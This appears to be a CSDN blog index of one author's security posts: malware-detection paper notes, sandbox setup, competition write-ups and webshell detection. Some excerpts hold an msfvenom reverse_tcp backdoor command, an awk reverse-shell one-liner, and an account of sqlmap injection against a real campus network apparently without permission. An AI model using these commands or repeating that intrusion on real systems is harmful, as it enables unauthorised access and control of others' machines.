![](https://img-blog.csdnimg.cn/20201014180756757.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
信息安全
文章平均质量分 61
梦想闹钟
这个作者很懒,什么都没留下…
展开
-
用Python制作邮件检测器
使用python制作垃圾邮件email检测过滤器原创 2023-02-27 16:54:41 · 819 阅读 · 0 评论 -
论文阅读笔记-A Lightweight Real-Time Cryptojacking Detection System
NDSSMINOS*: A Lightweight Real-Time Cryptojacking Detection System链接https://www.ndss-symposium.org/wp-content/uploads/ndss2021_4C-4_24444_paper.pdf总的来说,是因为挖矿类恶意软件因为POW等机制,需要通过相同的哈希算法来实现统一的POW方案,因此提取恶意软件的代码进行灰度图化后相似度很高,通过这种方法来识别恶意挖矿软件。附:什么是POW和POS,二者区别联原创 2021-07-05 21:12:06 · 358 阅读 · 1 评论 -
DNS隧道调研笔记
DNS隧道调研笔记原创 2023-01-04 11:42:07 · 1110 阅读 · 1 评论 -
Cuckoo沙箱调研
cuckoo沙箱的详细介绍转载 2022-12-20 17:23:40 · 483 阅读 · 0 评论 -
恶意软件同源性方法研究(恶意软件溯源)
恶意代码溯源方法介绍集合转载 2022-11-16 15:22:26 · 666 阅读 · 0 评论 -
python 修改PE文件头
用python修改PE文件头原创 2022-09-21 17:34:34 · 681 阅读 · 0 评论 -
ssh秘钥和python 虚拟环境
用ssh秘钥登录以及使用python 虚拟环境原创 2022-08-29 17:29:44 · 480 阅读 · 0 评论 -
使用wireshark进行基础的日志审计
可以通过tcpdump -i 把网络流量打印出来进行审计Wireshark下载地址:https://www.wireshark.org/download.html其中常用的几种过滤字段:ip过滤:ip.src==x.x.x.xip.dst==x.x.x.x端口过滤:http.port==xxtcp.port==xx协议过滤:http,tcp,icmp,udphttp.request.method==POST链接符使用:and,or通用的过滤条件在左上方填写,其中按下ctrl原创 2022-05-23 21:22:01 · 763 阅读 · 0 评论 -
使用metasploit制做基础的后门程序
这里使用metasploit自带的payload生成后门exe文件,LHOST指定连接的地址,LPORT字面意思指定连接的端口,靶机在点击后,就会自己去连接攻击机的端口msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.102.131 LPORT=6060 -f exe > myvirus.exe之后上传到windows xp的靶机里并点击运行,需要先确保靶机和攻击机能ping通之后在攻击机再次加载对应的payload并进行监原创 2022-05-23 20:59:47 · 245 阅读 · 0 评论 -
2021年安全类比赛writeup总结
360数字安全竞赛恶意软件家族分类本赛题的主要目标为恶意软件家族分类,赛题数据集包含了来自10个恶意软件家族,10000多个恶意软件的PE文件(No header)和使用IDAPro生成的asm文件。赛题采用多分类对数损失函数logloss对结果进行评价样本存在种类分布不均,大小不一的特点,如其中7,8,9类占的比例较大**第二名解法: https://mp.weixin.qq.com/s/q0ScSZyXFK8XLgMTBU9k5g**特征选择:提取了字节直方图、字节熵直方图、字符串信息等静态转载 2022-02-20 11:41:09 · 1659 阅读 · 0 评论 -
空间域非LSB的音频数字水印
信息隐藏课老师布置了作业,要求是把校徽嵌入一段音频里:完整代码数据+PPT:链接:https://pan.baidu.com/s/1JDcgrZeuJrQelN6WyiN0hg提取码:9qyr最终我采用的是将校徽转成二值图像然后化成矩阵的形式,将水印图像转化为01比特流最终选择了两种嵌入方法,一种是新加一个信道,一种是在原来的信道上嵌入信息在实验时用的是python,安装ffmpeg时遇到了一些问题,最终直接使用conda安装,解决了问题conda install -c https原创 2021-11-17 21:07:30 · 560 阅读 · 0 评论 -
字节跳动 安全ai挑战赛初赛参赛总结
初赛赛题https://security.bytedance.com/fe/ai-challenge#/project?id=1&active=1字段:我主要提取的特征就是(userid,product_id)(userid,product_1st_category)这些元组出现的次数,加上产品id总共出现的次数和userid总共出现的次数,但是对于地址这块我没想到好的特征提取方法,然后模型用的是lgboost,已经加了class weight,最终正确率是80%,按照官方积分的算法尝试的最原创 2021-11-01 11:25:45 · 352 阅读 · 0 评论 -
Data fountain 基于人工智能的恶意软件家族分类 参赛总结
我自己单独做的loss是在0.78左右,学长的方法loss能达到0.207左右给的数据,是一个恶意软件去掉pe头的asm文件和对应的pe文件。此外,样本有分布不均的特点,因此在训练模型的时候需要注意加上对应的权重我自己使用的方法是:提取两部分特征,一部分是文件的区间熵+文件大小+2进制读取的时候0-255字节分别出现的数量+常用opcode出现的次数+字符串出现的数量,字符串最长长度,平均长度,这部分特征是长度2500的一维向量第二部分是文件内容取前30万行,将其中以6个空格开头的行收集起来,筛去原创 2021-11-01 11:05:04 · 908 阅读 · 2 评论 -
Datacon21 参赛总结
这次参加了软件供应链以及域名两个方向,都是第10名本篇主要记录一下域名方向的做题记录域名方向主要分两个题目,第一个题目是给你一堆黑产域名,需要判断域名所属的黑产家族,以及涉黄涉赌的情况。第一题主要考验的是爬虫的构造,以及信息的获取方式。我暂时发现了可以通过以下几种方式来识别黑产网页:Js特征:在静态请求网页的时候,能在网页源码里看到形如下图的百度的站点统计代码,通过正则表达式筛选出js?后面的长段字符串,相同的网页的这种字符串也是相同的,通过这种方式识别恶意网页家族速度较快,效果很好。图片原创 2021-11-01 10:39:45 · 497 阅读 · 0 评论 -
tensorflow 拼接不同的神经网络结构
最近尝试了将两个网络组合,下面的代码是将cnn和mlp网络进行组合的示例,输入CNN网络的特征维度是n40000,将其转化为n(200200)的维度输入到cnn网络中,卷积过后再和维度为n2500的特征结合,输入到mlp网络里去,最终输出是对应10分类的概率,关键是使用 layers.concatenate将不同网络的输出拼接起来,作为新网络的输入。同时,使用多个网络和多个输入时也需要提前声明多个Input层,以及model里的输入格式models.Model(inputs=[input1, input2]原创 2021-09-23 17:44:02 · 1970 阅读 · 0 评论 -
反弹shell失败 原来是这个原因
在学习反弹shell的相关知识时,尝试在kali2上使用反弹shell提示没有/dev/tcp 这是怎么回事呢?我百度了一下,大部分的说法是这个目录是bash创建的一个虚拟目录,但还是没有解决问题,最后在谷歌上找到了解释https://evilpan.com/2021/04/25/reverse-shell/因此还是使用awk命令一句话反弹shellawk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell原创 2021-08-31 22:23:54 · 6181 阅读 · 6 评论 -
一个用于应急响应作业的网站
用python写的应急响应系统总体思路如下,后台是python flask,通过python维护一个ssh连接对象,通过该对象和服务器进行交互,执行设定好的命令同时将结果返回前端,最后将所有检测的结果合成为html类型的应急响应报告并输出。整体思路攻击者在进行网络攻击时具有相似的攻击思路:通过寻找服务器和网页的漏洞,逐渐由浅入深,最终控制服务器,并有目的地进行一些操作,如添加挖矿程序,设置后门用户等。本系统根据原创 2021-08-13 17:20:37 · 338 阅读 · 0 评论 -
论文阅读笔记-Certified Malware: Measuring Breaches of Trust in the Windows Code-Signing PKI
CCSCertified Malware: Measuring Breaches of Trust in the Windows Code-Signing PKIhttp://users.umiacs.umd.edu/~tdumitra/papers/CCS-2017.pdf作者提到了经过签名的恶意软件,即使是错误的签名,也能在一定程度上干扰杀毒软件的判断。那些经过了正确签名的恶意软件,其用于签名的证书大部分是由于证书发布方管理不善被滥用,剩下的是恶意软件作者伪造身份申请到的。第一章1.作者指出代原创 2021-07-28 17:42:53 · 174 阅读 · 0 评论 -
使用正则匹配进行简单的日志审计
主要通过正则匹配来检查是否存在xss,sql注入类型的攻击,因为仅使用了简单的正则匹配所以筛查效果有限,网络访问日志来源是自己搭建的服务器,如果之后日志下载:链接:https://pan.baidu.com/s/1tCWMB4oA4juWTYjx_2qZmw提取码:1c6limport subprocessimport sysfrom .host_info import existimport reimport osimport requestsimport timefrom geven原创 2021-06-10 16:14:12 · 491 阅读 · 0 评论 -
使用有向图来识别webshell
首先数据来源自己搭建的服务器上的网络日志,需要提前开启设置,记录网页跳转的源网页和目的网站日志文件链接:https://pan.baidu.com/s/1GR49-Qwczrd7kmk-0XCrHw提取码:6z0w主要思想是通过网络日志构建有向图,图中包含了网页之间的跳转关系,如果网站上存在webshell,那么webshell会是单独的一个点,因为正常来说webshell和其他网页之前不会有关联关系,具体代码如下,需要在处理日志的时候去掉重复的线段,不然生成的有向图会过于复杂import netw原创 2021-06-09 19:59:50 · 127 阅读 · 3 评论 -
论文阅读笔记-You Are What You Do: Hunting Stealthy Malware via Data Provenance Analysis
NDSSYou Are What You Do: Hunting Stealthy Malware via Data Provenance Analysis链接:https://www.ndss-symposium.org/wp-content/uploads/2020/02/24167-paper.pdf第一章 简介1.文中介绍了现阶段的恶意软件多采用免杀技术来防范安全软件的检测,如进程重命名、文件重命名等,一般的恶意软件会把payload直接存在盘上,而这种经过免杀处理的恶意软件会把恶意逻辑隐藏原创 2021-06-09 16:32:54 · 590 阅读 · 2 评论 -
阅读笔记-通过网络日志来检测攻击
最近在研究通过网络日志来检测网络攻击,在这里记录下读过的相关文章,文章来源主要是ACM Digital LibraryHighly Predictive Blacklisting1.文章里主要介绍了一种设置网络黑名单的方法2. 首先需要对日志进行一些过滤,如先筛去无效ip产生的日志,对常见的网站爬虫设置白名单, 同时排除了源端口为53 (DNS), 25 (SMTP), 80 (HTTP), 443 (VPN), 目的端口为 TCP 53 (DNS) 25 (SMTP)的网络日志条目,因为防火墙原创 2021-06-02 18:04:58 · 304 阅读 · 0 评论 -
论文阅读笔记-Towards Paving the Way for Large-Scale Windows Malware Analysis
CCSTowards Pavingthe Way for Large-Scale Windows Malware Analysis:Generic Binary Unpacking with Orders-of-Magnitude PerformanceBoosthttps://rbonichon.github.io/asi36/papers/p395-cheng.pdf摘要部分1.文中指出打包工具会混淆API调用的标准用法,恶意软件使用导入地址表IAT来充当动态链接的API查找表,而IAT在原创 2021-05-30 16:56:54 · 211 阅读 · 1 评论 -
论文阅读笔记-Prevalence and Impact of Low-Entropy Packing
NDSS Prevalence and Impact of Low-Entropy PackingSchemes in the Malware Ecosystemhttps://www.ndss-symposium.org/wp-content/uploads/2020/02/24310-paper.pdf1.实验结果表明仅通过熵这种静态特征来判断软件是否打包是不准确的2.现存的恶意软件以及意识到了熵的影响,且在有意识地使用字符填充和调整编码等方式来降低恶意软件的熵3.部分恶意软件使用了自定义的打原创 2021-05-23 19:02:56 · 224 阅读 · 1 评论 -
信息安全常用会议介绍
贴一个学长给的收录信息安全常用文章的网站https://secpaper.cn/从知乎看过来的关于信息安全类会议的排名https://www.zhihu.com/answer/145831681SecurityA 类: S&P,B类: NDSS, USENIX Security, CCSC类:AsiaCCS, PETS, CT-RSA可以看到,默认的搜索选项除了上述几个外还有IMC,DSN等会议,不过国内关于这些会议的介绍比较少,这里先记录下这些会议的全称等,之后有更多了解之后再更新原创 2021-05-18 11:29:17 · 1370 阅读 · 2 评论 -
将秘钥嵌入图片进行加文件加解密
这个是当时参加密码学竞赛的一个作品,主要想法是将rsa的公钥和私钥藏进图片里面,程序主要代码链接:https://pan.baidu.com/s/1AIDpIAtQqMRfg59lWFFQiQ提取码:lwv4主要思路如下,鉴于图片有3个信道,每个信道的值是0-255,其实可以把信息嵌入其中。先说下解码方式,对于图片,以33的卷积方式读取图片的其中一个信道,对33内9个数值进行取余64后再取最大值的操作,然后将这个“卷积,取余,取最大值”得到的数值映射到base64编码上去,最终从图片提取一串ba原创 2021-05-14 21:10:22 · 688 阅读 · 0 评论 -
注释对webshell检测的影响以及处理
最近在做webshell检测方面的研究,发现注释对检测还是有影响的比如以下的这段webshell<?phpini_set('allow_url_include, 1'); // Allow url inclusion in this script// No eval() calls, no system() calls, nothing normally seen as malicious.include('php://input');echo "success";?>如果直接原创 2021-05-14 15:37:09 · 150 阅读 · 0 评论 -
ubuntu 18.04 lts 安装cuckoo沙箱踩坑记录
记录下安装沙盒cuckoo的过程,差不多花费了一个星期,这中间遇到了各种各样的坑首先是安装系统,我是原来的系统是win10,安装ubuntu版本是18.04 ltsUbuntu 18.04官网下载地址:https://releases.ubuntu.com/18.04/ubuntu-18.04.5-desktop-amd64.iso.torrent?_ga=2.21914808.2028854723.1605333772-1051256952.1605169591下载好之后,在我的电脑里进行划分硬盘原创 2020-12-15 17:25:20 · 915 阅读 · 0 评论 -
kali-metaspolit等工具更新指南
这里主要记载kali的各类工具更新方法,网上搜的方法不一定能解决问题,我把解决我问题的链接放这kali-metaspolit更新指南:我在更新这个的时候就是gem,bundle轮着出问题,最后研究后发现原因是源太老了,所以下依赖包的时候缺了某个包导致装不上去。再更新源的时候也很无语,kali一直提示新的源,不安全,所以“好心”地帮我换成默认配置了。折腾了一个晚上终于搞定了,浙大的源是能用的,我是kali2版本,清华阿里都试了,还是浙大的源好用先用这个链接换/etc/apt/source.list文件里原创 2020-08-13 08:48:19 · 505 阅读 · 0 评论 -
记一次校园网渗透经历
首先注入点是这里,其实原来右边是没有这个通知公告的,加了以后就加出问题来了,这个其实是一个用于登录校园网wifi的网站网址http://***/index.php/index/notice/id/1 点进去是一个上网须知怀疑id/1中 1为注入点,上sqlmap!!sqlmap -u “http://**/index.php/index/notice/id/” --level 3跑出来发现是一个注入点然后接下来 --dbs得到库名后用-D radius --tables看下表,这时候已经原创 2020-08-13 08:48:45 · 2965 阅读 · 0 评论